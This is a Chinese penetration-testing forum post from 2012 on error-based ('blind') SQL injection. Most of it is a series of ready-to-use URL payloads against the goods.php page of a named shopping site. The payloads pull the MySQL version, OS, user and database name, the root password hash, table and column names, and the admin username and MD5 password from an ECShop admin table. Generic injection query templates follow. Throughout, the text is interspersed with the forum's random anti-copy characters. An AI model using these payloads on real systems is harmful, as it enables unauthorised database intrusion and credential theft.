找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 盲注详细内容
返回列表 发新帖
查看: 2834|回复: 0
打印 上一主题 下一主题

盲注详细内容

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-5 14:59:30 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
判断版本号 4 S- W" x3 P& R2 b
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%235 s/ L) j2 E/ ^8 U
' |7 n1 R, f) @1 C9 u
判断系统5 l7 d4 G) h8 j

1 }# w: `1 k3 M! N0 q/ g8 e: Chttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version_compile_os%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23" {- H; [. N: y- ~
' C/ A" w) t- y: T  M, Y! x
( o1 X2 `+ O7 o8 r9 J* y
6 p, g( d' X: S; A% U5 D
当前 user()
; k& G9 w" _2 d9 d
% @6 D* p2 \1 S1 r9 G2 N- whttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20user()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23+ ^# Q" M8 B3 z7 j& R
2 Z9 \( U8 ?' ~3 o
2 ~! ]4 C8 d. a
' T( @1 m6 b. D
当前 database()6 g1 v5 F- U& l
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20database()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%237 C1 h; F; L3 L
: `( d( t. ?1 G+ u/ p

  p! ~$ X- H, q* C& R( |
, F& p! n& O. C3 F$ T0 c' K* b
2 {2 z  i/ H6 P& Jroot hash, ^, l0 _$ ^% o& q# n8 F; e

# ?6 G# F& F! d0 |; @http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20Password%20from%20mysql.user%20where%20User=char(114,111,111,116)),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
$ ?! h9 B7 c; F7 c* Q& @
' [+ E& C( W8 E, |
% H0 b! ~! l5 x% f- u! {; b' I1 M+ N; g1 j+ i
当前 数据库表名' z% }# M( e0 k3 O9 R- B. v8 E# S

- B( e8 h/ [: K$ z  l5 |% mhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20TABLE_NAME%20%20from%20information_schema.tables%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20limit%206,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
4 F, q" l6 E& O6 F( r: U. m* t& n
' P5 E6 C2 {- C: S. i5 ^) H
, t6 ~/ j& n' R0 s( d4 c2 `: v9 s5 r# g
当前 数据库 user_name 字段9 H1 d& r  W( C, X

, e2 m# _' w. Z' X' n  F+ V5 e( j! |- Xhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%202,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%233 N# p* n: |2 N- Q+ Q+ Q

# b2 S5 T- s; x( a3 H$ B当前 数据库 字段 password
# l/ ?2 A/ \# V! uhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%204,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
# Y8 o* a6 z" u7 ?1 a6 k/ ?; A
, ^3 _" W; x, T4 i; M3 P- L
! S7 o9 `. U7 F2 n3 t) B
" N+ t+ u7 V. u0 K- G获得 admin passwd(md5)' g2 c5 e; b, m) j
3 U" a& {/ q; f, @) M* a2 p' Q

# Z' I$ g% k3 N. v) Khttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20concat_ws(char(94),ifnull(cast(%60password%60%20as%20char),char(32)),ifnull(cast(%60user_name%60%20as%20char),char(32)))%20%20from%20sansan1.ecs_admin_user%20limit%200,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
' `0 c1 P0 L/ z# G- b3 _' d: @6 e5 B; H* I
报错注射
, z8 }& Q5 q) `' R" F( w7 c9 LSELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select version()) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)2 H! }0 N5 \: @7 U$ ^6 c$ C
6 N0 ?; N, H4 n
SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select username FROM admin_table LIMIT 0,1) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)9 L+ c8 x7 h, p& c2 I

; v5 X& v8 c% e% H6 j: u8 u! M+ Z- Hand(select 1 from(select count(*),concat((select (select (Select concat(0x7e,0x27,SCHEMA_NAME,0x27,0x7e) FROM information_schema.SCHEMATA LIMIT 21,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表